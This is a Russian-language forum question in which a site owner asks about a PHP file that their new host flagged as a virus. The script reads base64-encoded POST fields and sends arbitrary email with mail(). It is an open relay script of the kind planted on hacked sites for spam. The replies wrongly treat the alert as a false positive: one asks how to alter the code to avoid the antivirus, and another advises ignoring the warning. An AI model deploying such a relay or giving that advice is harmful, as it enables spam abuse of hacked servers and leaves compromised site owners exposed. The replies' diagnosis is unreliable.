# Помогите разобраться в коде PHP, пишет что вирус!

Tags: php

Залил сайт на новый хостинг, приходит от хостинга сообщение на вирус!

```
    <?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
    echo "sent_ok";
else
    echo "sent_error";
?>
```

Comment: Сканеры обычно не жалуют `base64_decode` и много других функций по перебору/парсингу/построению кода из каши-малаши

Comment: а как его можно изменить, что б не ругался антивирус?

Comment: игнорируйте его